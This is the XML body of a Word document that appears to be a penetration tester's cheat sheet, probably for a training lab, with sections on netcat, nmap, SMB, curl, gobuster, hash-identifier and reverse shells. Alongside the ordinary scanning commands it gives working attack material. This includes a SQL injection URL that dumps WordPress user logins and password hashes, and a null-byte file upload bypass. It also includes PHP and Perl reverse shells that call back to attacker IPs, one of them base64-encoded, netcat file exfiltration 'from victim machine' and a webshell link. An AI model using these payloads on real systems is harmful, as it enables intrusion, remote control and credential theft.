          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;filename&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1C7EAB" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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ransfer file to &lt;ip&gt; &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42344F78" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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nc -nvlp 4444 -e &lt;cmd&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD99744" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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listens on port and runs &lt;cmd&gt; when something connects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158D0264" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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nc &lt;ip&gt; 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA18560" w14:textId="0148E538" w:rsidR="007351F7" w:rsidRPr="00027505" w:rsidRDefault="007351F7" w:rsidP="007351F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f a webserver is running on the ip, this can be used to connect to get server version, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648E3928" w14:textId="78924010" w:rsidR="00027505" w:rsidRDefault="00027505" w:rsidP="0002750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How to transfer file from victim machine with nc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133F2392" w14:textId="77777777" w:rsidR="00027505" w:rsidRPr="00304AF8" w:rsidRDefault="00027505" w:rsidP="00304AF8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 w:rsidRPr="00304AF8">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>On the receiving end running,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7844539B" w14:textId="77777777" w:rsidR="00027505" w:rsidRPr="00304AF8" w:rsidRDefault="00027505" w:rsidP="00304AF8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 w:rsidRPr="00304AF8">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc -l -p 1234 &gt; out.file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665E0720" w14:textId="77777777" w:rsidR="00027505" w:rsidRPr="00304AF8" w:rsidRDefault="00027505" w:rsidP="00304AF8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 w:rsidRPr="00304AF8">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>On the sending end running,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4044351C" w14:textId="77777777" w:rsidR="00027505" w:rsidRPr="00304AF8" w:rsidRDefault="00027505" w:rsidP="00304AF8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 w:rsidRPr="00304AF8">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc -w 3 [destination] 1234 &lt; out.file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB0A26C" w14:textId="77777777" w:rsidR="00027505" w:rsidRPr="00027505" w:rsidRDefault="00027505" w:rsidP="0002750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Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1886A5EB" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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0097ED62" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc533025660"/>
      <w:r>
        <w:t>NMAP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="5F7A873D" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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nmap -sS &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA329AA" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0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>Basic Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608269C0" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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nmap -p- -A &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061FC27F" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scans all ports, vulnerabilities, version number, OS identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B752A27" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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nmap --script=vuln &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DECD7F" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0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>Vulnerable Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E44E0" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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nmap -sU &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352500A5" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="720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UDP scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6796876A" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Raleway" w:eastAsia="Raleway" w:hAnsi="Raleway" w:cs="Raleway"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D5E6AB" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc533025661"/>
      <w:r>
        <w:t>SAMBA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6CFEFCF1" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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SMB1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2000, XP &amp; 2003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3AAD0E" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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enum4linux -a &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0D9D2C" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr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SMB2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vista SP1 &amp; 2008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68536577" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr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SMB2.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7 &amp;2008 R2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6268872E" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr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SMB3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8 &amp; 2012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F16E0B4" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB72FF0" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_whq3hbmwuwat" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="6" w:name="_Toc533025662"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t>CURL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="0DB6B5CD" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl -i &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35692203" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Get request banner info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4A8AD5" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl -i -L &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C689C0" w14:textId="094F7F4E" w:rsidR="00CE65B5" w:rsidRPr="00C36478" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>request/response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A9000D" w14:textId="77777777" w:rsidR="00C36478" w:rsidRPr="00C36478" w:rsidRDefault="00C36478" w:rsidP="00C36478">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:left w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:bottom w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:right w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6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SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C36478">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>curl -i http://10.11.1.71/cgi-bin/test.cgi -s &gt; test.cgi.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9DCA1" w14:textId="1A6A621D" w:rsidR="008E162F" w:rsidRDefault="00D0273D" w:rsidP="008E162F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0273D">
        <w:t>curl http://10.11.1.229/ --upload-file test.php%00.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42ACC0" w14:textId="3C4872A0" w:rsidR="008E162F" w:rsidRPr="008E162F" w:rsidRDefault="008E162F" w:rsidP="008E162F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="394" w:after="394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url -L "</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00D0759E" w:rsidRPr="00815409">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:eastAsia="Montserrat" w:hAnsi="Consolas"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://10.11.0.55/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%23</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACA711A" w14:textId="3361B61B" w:rsidR="004A1297" w:rsidRDefault="004A1297" w:rsidP="00C36478">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05AF05B2" w14:textId="370AE223" w:rsidR="00CF75C9" w:rsidRDefault="00CF75C9" w:rsidP="00CF75C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc533025663"/>
      <w:r>
        <w:t>Proxychains</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="40512571" w14:textId="6208B91B" w:rsidR="00CF75C9" w:rsidRDefault="00CF75C9" w:rsidP="00CF75C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF75C9">
        <w:t>proxychains davtest -url http://10.11.1.229</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590257C8" w14:textId="77777777" w:rsidR="00CF75C9" w:rsidRPr="00CE65B5" w:rsidRDefault="00CF75C9" w:rsidP="00CF75C9"/>
    <w:p w14:paraId="750BCCF5" w14:textId="59F4314B" w:rsidR="00A937BC" w:rsidRPr="00A937BC" w:rsidRDefault="00A937BC" w:rsidP="00A937BC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc533025664"/>
      <w:r>
        <w:t>GoBuster</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="13A3CDB0" w14:textId="5C4242DC" w:rsidR="00A937BC" w:rsidRPr="00A937BC" w:rsidRDefault="00A937BC" w:rsidP="00A937BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:left w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:bottom w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:right w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6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rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A937BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>gobuster -u http://10.11.1.71/ \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B5FFD" w14:textId="7A6DC1D8" w:rsidR="00CE65B5" w:rsidRDefault="00CE65B5" w:rsidP="00CE65B5">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB264E4" w14:textId="6BFEC407" w:rsidR="00CE65B5" w:rsidRDefault="00CE65B5" w:rsidP="00CE65B5">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F452013" w14:textId="5C69C056" w:rsidR="00CE65B5" w:rsidRDefault="00CE65B5" w:rsidP="006D74D7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc533025665"/>
      <w:r w:rsidRPr="00B55751">
        <w:t>Hash-identifier</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="0739377B" w14:textId="1AB337E3" w:rsidR="00CE65B5" w:rsidRPr="00CE65B5" w:rsidRDefault="00CE65B5" w:rsidP="00CE65B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE65B5">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        </w:rPr>
        <w:t>root@kali:~# hash-identifier </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6873B556" w14:textId="4410ED2A" w:rsidR="00CE65B5" w:rsidRPr="00CE65B5" w:rsidRDefault="00CE65B5" w:rsidP="00CE65B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then can find the hashing </w:t>
      </w:r>
      <w:r w:rsidR="0032110B">
        <w:t>type to decrypt to find the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBCDAA1" w14:textId="6C5601D4" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="008C4E39"/>
    <w:p w14:paraId="3A910C44" w14:textId="6990560E" w:rsidR="008C4E39" w:rsidRDefault="008C4E39" w:rsidP="008C4E39"/>
    <w:p w14:paraId="6247DB8E" w14:textId="3D8A6F9E" w:rsidR="008C4E39" w:rsidRDefault="008C4E39" w:rsidP="008C4E39">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc533025666"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Reverse shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="02E8C962" w14:textId="3F42D398" w:rsidR="008C4E39" w:rsidRDefault="008C4E39" w:rsidP="008C4E39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C4E39">
        <w:t>&lt;?php exec("/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/10.11.0.</w:t>
      </w:r>
      <w:r w:rsidR="00854F9A">
        <w:t>55</w:t>
      </w:r>
      <w:r w:rsidRPr="008C4E39">
        <w:t>/4444 0&gt;&amp;1'");?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EC4BB3" w14:textId="2CF08CB7" w:rsidR="008C4E39" w:rsidRDefault="008C4E39" w:rsidP="008C4E39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C4E39">
        <w:t xml:space="preserve">&lt;?php </w:t>
      </w:r>
      <w:r>
        <w:t>shell_</w:t>
      </w:r>
      <w:r w:rsidRPr="008C4E39">
        <w:t>exec("/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/10.11.0.177/4444 0&gt;&amp;1'");?&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (reply entire output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235313EF" w14:textId="5B964B24" w:rsidR="0088209C" w:rsidRDefault="00741D1A" w:rsidP="008C4E39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Can create another reverse shell to get a reverse shel</w:t>
      </w:r>
      <w:r w:rsidR="00874B44">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00856947">
        <w:t xml:space="preserve"> - Webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6666A4F4" w14:textId="7E637E74" w:rsidR="00741D1A" w:rsidRDefault="00087892" w:rsidP="00741D1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00C96FFD" w:rsidRPr="00800B9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/WhiteWinterWolf/wwwolf-php-webshell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C96FFD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F72472" w14:textId="0BE1C332" w:rsidR="00874B44" w:rsidRDefault="00874B44" w:rsidP="00874B44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSH method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0A12C1" w14:textId="54AD566A" w:rsidR="00874B44" w:rsidRDefault="00874B44" w:rsidP="00874B44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
      <w:r w:rsidR="005734B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>passthru</w:t>
      </w:r>
      <w:r w:rsidR="005734B5">
        <w:t>(base64_decode(‘&lt;</w:t>
      </w:r>
      <w:r w:rsidR="005734B5" w:rsidRPr="005734B5">
        <w:t>bmMgLWUgL2Jpbi9zaCAxMC4xMS4wLjU1IDQ0Mwo</w:t>
      </w:r>
      <w:r w:rsidR="00465F98">
        <w:t>(ur reverse shell encoded)</w:t>
      </w:r>
      <w:r w:rsidR="005734B5" w:rsidRPr="005734B5">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="005734B5">
        <w:t>’)); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D913FA" w14:textId="6DB79045" w:rsidR="008B4B37" w:rsidRDefault="008B4B37" w:rsidP="008B4B37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PERL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA7D1F8" w14:textId="5F0528CB" w:rsidR="007D65D7" w:rsidRDefault="007D65D7" w:rsidP="002617C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002617C6">
        <w:t>perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FACE7B" w14:textId="77777777" w:rsidR="00CA330A" w:rsidRPr="002617C6" w:rsidRDefault="00CA330A" w:rsidP="00CA330A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36268900" w14:textId="55852D0F" w:rsidR="008B4B37" w:rsidRDefault="007D65D7" w:rsidP="007D65D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encoding before transfer reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6572D3A6" w14:textId="77777777" w:rsidR="002617C6" w:rsidRDefault="002617C6" w:rsidP="002617C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>&lt;?php $cmd="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E8265" w14:textId="7975248C" w:rsidR="007D65D7" w:rsidRDefault="002617C6" w:rsidP="002617C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002617C6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
